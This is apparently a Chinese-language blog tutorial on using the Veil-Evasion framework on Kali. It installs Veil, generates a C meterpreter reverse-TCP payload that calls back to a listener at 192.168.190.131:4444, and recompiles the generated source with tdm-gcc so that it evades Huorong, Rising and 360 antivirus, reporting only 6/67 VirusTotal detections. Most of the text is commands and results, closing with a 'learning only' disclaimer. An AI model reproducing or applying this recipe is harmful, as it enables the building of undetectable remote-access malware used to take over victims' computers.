Veil-Evasion是一个用python写的免杀框架,可以将任意脚本或一段shellcode转换成Windows可执行文件,还能利用Metasploit框架生成相兼容的Payload工具,从而逃避了常见防病毒产品的检测。
0x00 Veil安装
我是直接在kail下面安装的
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
0x01 Veil使用
veil有两个免杀的工具,Evasion和Ordnance。
Ordnance可生成在Veil-Evasion中使用的shellcode,Evasion是用做文件免杀。
我们一般选择Evasion
Veil>: use Evasion
# use <id | name> 进入或使用当前可以使用的tool或者payload
列出payload
Veil/Evasion>: list
# list 列出当前可以使用的tool或者payload
选择使用 c/meterpreter/rev_tcp.py
Veil/Evasion>: use 7
#设置 需要IP和端口
[c/meterpreter/rev_tcp>>]: set lhost 192.168.190.131
[c/meterpreter/rev_tcp>>]: set lport 4444
#生产payload
[c/meterpreter/rev_tcp>>]: generate
#payload命名C01
[>] Please enter the base name for output files (default is payload): C01
源码: /var/lib/veil/output/source/C01.c
生成的exe :/var/lib/veil/output/compiled/C01.exe
0x02 Veil原生C01.exe 执行测试
说明:
192.168.190.1 安装瑞星和火绒
192.168.190.129安装360杀毒和360安全卫士
开启msf,设置好监听
在192.168.190.1上点击下载瞬间被火绒检测报毒
在192.168.190.129上点击下载并检测无异常
尝试执行
成功上线了一会后被杀,躲过了静态,没躲过动态
0x03 tdm-gcc
tdm-gcc下载地址:https://jmeubank.github.io/tdm-gcc/
TDM-GCC是一款适用于windows平台的gcc编译工具,主要适用于c语言开发者使用,软件集合了GCC 工具集中最新的稳定发行版本,包含了丰富实用的开发工具供开发者使用,安装后就可以正常使用
0x04 使用tdm-gcc编译生成 C02.exe 执行测试
/var/lib/veil/output/source/C01.c编译生成C02.exe
gcc C02.c -o C02.exe -lwsock32
在 192.168.190.129上执行
执行C02.exe成功上线
将C02.exe复制到192.168.190.1
瑞星和火绒均未检测出风险
执行
成功上线
virustotal.com中6/67个报毒
综上所诉,Veil+tdm-gcc达到的免杀效果还是不错的
仅用于学习交流,不得用于非法用途
如侵权请私聊博主删文